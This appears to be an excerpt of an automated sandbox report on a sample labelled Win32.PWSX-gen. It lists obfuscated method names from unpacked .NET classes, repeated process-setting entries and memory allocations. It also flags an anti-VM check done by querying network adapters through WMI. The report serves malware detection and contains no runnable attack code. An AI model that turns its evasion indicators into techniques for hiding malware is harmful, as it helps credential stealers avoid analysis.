                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, kO0PeOKvYl9CrUw7nI.csHigh entropy of concatenated method names: 'ehc3Oil0X3', 'qqx32kKU4Q', 'NGl3s4wIef', 'iQa3KuVklv', 'gAP3EKmd9O', 'uP93eWsg8Z', 'Gd33kqc71B', 'usn3LZnNZC', 'Lm53qmCXka', 'wY43117XJg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, nj8CIy7UkDgJlnsAA8.csHigh entropy of concatenated method names: 'ToString', 'cFneUDEodN', 'EneeM1MV8i', 'lWpewNPVtG', 'IEkeVjUV9Q', 'zLnecVwVG8', 'z0SefjxQVJ', 'OXmejC7W3R', 'JTneuKcgyA', 'WtbeGaMtIY'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, FLm1IIQZ2raRLRjPmL.csHigh entropy of concatenated method names: 'Dispose', 'CMBWT69JZn', 'e7KDMHmra2', 'MwKggIqaXb', 'WSvWyulNwi', 'nkaWzeFrSD', 'ProcessDialogKey', 'lALDPwRyIO', 'fnuDWjIfaa', 'FIEDDURmXg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, Vus40WWPY4tv91QueSt.csHigh entropy of concatenated method names: 'PSdqbmFb3T', 'kYpqaKhwwn', 'aZaq5AaKeF', 'uDbqOA8cxw', 'WUkqoL3lMV', 'Oq2q22t4lI', 'TQaqZMQftZ', 'Q26qsbdDQS', 'QryqK5a9w7', 'SydqArDAOL'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, q1OrjN3HMV0MbPAoNU.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gY8DTwRQQO', 'VcYDy4vP4d', 'wh6DzJjdUc', 'XjH6PkHnyr', 'uXZ6WIHOMR', 'xEP6DT0dVM', 'Ebo66Py3om', 'CuCmxrZ2HRAjmtG1Hl4'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, oWuL7OIDfIaE02x2wB.csHigh entropy of concatenated method names: 'B7Fpt39LWi', 'sIppQ6pVPl', 'GWipmEJHPX', 'gPJphxfPSG', 'lJyp9XPTbV', 'DPrmYjc8k8', 'lr4mxHnUNq', 'DvymvuloGW', 'ngLm4oImh5', 'rC9mTVW4PG'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, S3PGAnG8KjmOX9EZUq.csHigh entropy of concatenated method names: 'oQghb2NscV', 'iKchatavlW', 'DKch5VX9rM', 'AT9hOmyGOT', 'fsshoWmrct', 'tO9h2pjT9N', 'mVqhZUGPvA', 'kgqhsAH1lO', 'J86hKggvhL', 'RPihArqQpp'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, nS1vfe0bkY5G2t9q20.csHigh entropy of concatenated method names: 'E1wBsKKQKb', 'kSTBKCXuwO', 'NJnBIiQQY8', 'NV3BM3LZBU', 'YX7BVCWaZj', 'fNHBcLPuYA', 'hOpBjw8Md4', 'gRTBuFwLBq', 'XxKBJS8B2v', 'AbWBUtwr8d'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, E33hcSHIxISvMgLylX.csHigh entropy of concatenated method names: 'B02knqhyui', 'i7bki4gTJs', 'ToString', 'MVVklwidUE', 'jhbkQnAS6n', 'n09k3Toycv', 'IywkmP3gRA', 'sSHkp9Wba9', 'xJVkhGi3gE', 'IhFk9ROjtW'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, EZIYEA9L2ILVpWmM2J.csHigh entropy of concatenated method names: 'hl06tRCfAN', 'du26l2lLP3', 'jPb6QrCoW8', 'Om563hlv13', 'KPf6mGKIaP', 'npC6puPfK9', 'h966hcYvVK', 'VTB69EWZGq', 'rjU6XdKKHy', 'rnD6ngNEpG'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, fPvgG7swuttoZXeUIZ.csHigh entropy of concatenated method names: 'QbNQ8lRIC9', 'BO4QFreaop', 'XxxQ7Qnkfk', 'OU4QHurxiU', 'opaQYvhAa8', 'bRoQxmtw8u', 'nuZQvi1lQ1', 'hOLQ4UJFkb', 'zX3QTQCX1M', 'E03QyshSXd'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, ORmXg3yOriTsrTUdyW.csHigh entropy of concatenated method names: 'e5cqWsqhlI', 'aeqq6WaX8W', 'fkcqSvS6sB', 'Sglql1G9u3', 'gqlqQIAuE0', 'zDvqmFFKT3', 'aIXqpKJk3P', 'PMrLvB3USN', 'WhhL4mnIHN', 'KFZLTbJKLR'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, Ja7ioFzAH2H6C6rKgs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qBHqB6pdpG', 'qYIqEvGTYn', 'jLxqePIhUP', 'SwyqkCeGUb', 'kM8qLVhnG5', 'hInqqpl4Yt', 'Pnqq1iRD07'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, iUD8OvW6KDahnuBa1fO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'u2R18v5dDq', 'vpo1FeQvBW', 'FPG17E48X0', 'J0v1Hey0Gd', 'B401YVrFJ4', 'LEO1xYwlaB', 'mOH1vfwo8a'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, hcCjKASHGWF1cTPFpZ.csHigh entropy of concatenated method names: 'AMlWhPvgG7', 'HutW9toZXe', 'AvYWnl9CrU', 'H7nWiIsXGS', 'MaYWE8PEWu', 'r7OWeDfIaE', 'yBDnlamQWFOYyJFuxv', 'JkvDcm5EgYlleZDGNW', 'Y14WWk6viR', 'BQnW6jLE2T'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, D42KFcxIYB6xRydGN0.csHigh entropy of concatenated method names: 'Gv6k4wP3tr', 'x2MkyYUstT', 'Id1LPtOLED', 'BXNLWiVwvo', 'cdQkUdhovJ', 'ElAkRgPtxR', 'wWsk0aaHhQ', 'x82k89l0v1', 'BZkkF6FmiI', 'MAYk7v3SRq'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, rwRyIOTlnujIfaaAIE.csHigh entropy of concatenated method names: 'IPILIcvbWF', 'shwLMhWMB8', 'wxWLwDfjcE', 'OFvLVodUfx', 'ULnL8Z2BtO', 'e0iLcKqGff', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, bVPQiFDyroeRdkP8fS.csHigh entropy of concatenated method names: 'BHD5l3pl1', 'dD3O9F6Ii', 'gRC2LEmFj', 'WXGZj5R9L', 'GjRKYqD1T', 'FGoAiS0Ia', 'X638AjTlRLLUKUxtj2', 'wtdDsEDAOmoJhanfm3', 'efsLMPNal', 'nKl13fQag'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, DXGSvdA3Y6vVeGaY8P.csHigh entropy of concatenated method names: 'LT2moaoof7', 'JNGmZUkmPo', 'aJF3wlWFeA', 'vvK3VTHFa4', 'NED3cDMBKJ', 's1b3fESni9', 'GRE3jvEDcf', 'RkF3uj2m0V', 'n7B3G83bkj', 'NNg3J1yoY0'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, dvulNw4iBkaeFrSDnA.csHigh entropy of concatenated method names: 'k6JLlh2Fn5', 'mxjLQelfwK', 'fuBL32bLhu', 'syFLmubgMn', 'u1cLp8ukDO', 'zSLLhsrZII', 'ahoL9w16hx', 'FX0LXlxTfQ', 'Y0HLnE0RiW', 'l9qLid7aYl'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, BxjMHJjAaclTuYFA31.csHigh entropy of concatenated method names: 'uHEhlf61Wl', 'ifjh3FZy4g', 'yE9hp4w3Z5', 'EXppyeQypv', 'SQIpzbKu2T', 'LJJhPDS50S', 'ivqhWrf83q', 'g3WhD5rYrF', 'PZph6AsWXT', 'WgwhSfoMYd'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, sIirkVM8t1ejbhLhXr.csHigh entropy of concatenated method names: 'JQL5asNRat1uSVuU9FC', 'HJAVKbNwpvrBTdU2pYs', 'M8SeokNQqZxaF33lIo8', 'dqWpLsIG0M', 'JU0pq7CZ2Q', 'PQdp1HfUjt', 'RcwliqNsj1JMuAEx1s7', 'SIZpbwNGWfwjvMfLS1y'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, kO0PeOKvYl9CrUw7nI.csHigh entropy of concatenated method names: 'ehc3Oil0X3', 'qqx32kKU4Q', 'NGl3s4wIef', 'iQa3KuVklv', 'gAP3EKmd9O', 'uP93eWsg8Z', 'Gd33kqc71B', 'usn3LZnNZC', 'Lm53qmCXka', 'wY43117XJg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, nj8CIy7UkDgJlnsAA8.csHigh entropy of concatenated method names: 'ToString', 'cFneUDEodN', 'EneeM1MV8i', 'lWpewNPVtG', 'IEkeVjUV9Q', 'zLnecVwVG8', 'z0SefjxQVJ', 'OXmejC7W3R', 'JTneuKcgyA', 'WtbeGaMtIY'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, FLm1IIQZ2raRLRjPmL.csHigh entropy of concatenated method names: 'Dispose', 'CMBWT69JZn', 'e7KDMHmra2', 'MwKggIqaXb', 'WSvWyulNwi', 'nkaWzeFrSD', 'ProcessDialogKey', 'lALDPwRyIO', 'fnuDWjIfaa', 'FIEDDURmXg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, Vus40WWPY4tv91QueSt.csHigh entropy of concatenated method names: 'PSdqbmFb3T', 'kYpqaKhwwn', 'aZaq5AaKeF', 'uDbqOA8cxw', 'WUkqoL3lMV', 'Oq2q22t4lI', 'TQaqZMQftZ', 'Q26qsbdDQS', 'QryqK5a9w7', 'SydqArDAOL'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, q1OrjN3HMV0MbPAoNU.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gY8DTwRQQO', 'VcYDy4vP4d', 'wh6DzJjdUc', 'XjH6PkHnyr', 'uXZ6WIHOMR', 'xEP6DT0dVM', 'Ebo66Py3om', 'CuCmxrZ2HRAjmtG1Hl4'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, oWuL7OIDfIaE02x2wB.csHigh entropy of concatenated method names: 'B7Fpt39LWi', 'sIppQ6pVPl', 'GWipmEJHPX', 'gPJphxfPSG', 'lJyp9XPTbV', 'DPrmYjc8k8', 'lr4mxHnUNq', 'DvymvuloGW', 'ngLm4oImh5', 'rC9mTVW4PG'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, S3PGAnG8KjmOX9EZUq.csHigh entropy of concatenated method names: 'oQghb2NscV', 'iKchatavlW', 'DKch5VX9rM', 'AT9hOmyGOT', 'fsshoWmrct', 'tO9h2pjT9N', 'mVqhZUGPvA', 'kgqhsAH1lO', 'J86hKggvhL', 'RPihArqQpp'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, nS1vfe0bkY5G2t9q20.csHigh entropy of concatenated method names: 'E1wBsKKQKb', 'kSTBKCXuwO', 'NJnBIiQQY8', 'NV3BM3LZBU', 'YX7BVCWaZj', 'fNHBcLPuYA', 'hOpBjw8Md4', 'gRTBuFwLBq', 'XxKBJS8B2v', 'AbWBUtwr8d'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, E33hcSHIxISvMgLylX.csHigh entropy of concatenated method names: 'B02knqhyui', 'i7bki4gTJs', 'ToString', 'MVVklwidUE', 'jhbkQnAS6n', 'n09k3Toycv', 'IywkmP3gRA', 'sSHkp9Wba9', 'xJVkhGi3gE', 'IhFk9ROjtW'
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe PID: 6844, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMemory allocated: 3030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMemory allocated: 85B0000 memory reserve | memory write watchJump to behavior
